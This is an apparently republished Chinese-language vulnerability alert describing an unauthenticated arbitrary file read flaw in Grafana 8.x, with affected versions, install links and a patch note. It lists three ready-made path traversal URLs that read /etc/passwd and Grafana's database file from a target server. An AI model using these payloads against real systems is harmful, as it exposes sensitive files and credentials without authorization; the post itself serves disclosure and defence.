【漏洞预警】Grafana未授权任意文件读取漏洞

2023-10-02 18:23:44 浏览数 (3)

前言

Grafana是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。目前使用grafana的公司有很多,如paypal、ebay、intel等。

漏洞简述:

未授权的攻击者利用该漏洞,能够获取服务器敏感文件。

安装:

Github:

https://github.com/grafana/grafana

Docker安装:

https://www.voidking.com/dev-docker-grafana/

影响版本:

Grafana 8.x

刮刮乐:

http://x.x.x.x/public/plugins/graph/../../../../../../../etc/passwd

http://x.x.x.x/public/plugins/graph/../../../../../../../var/lib/grafana/grafana.db

http://x.x.x.x/public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

默认安装组件:

修补建议:

目前暂无相关补丁,及时关注官方动态,获取最新版本。

0 人点赞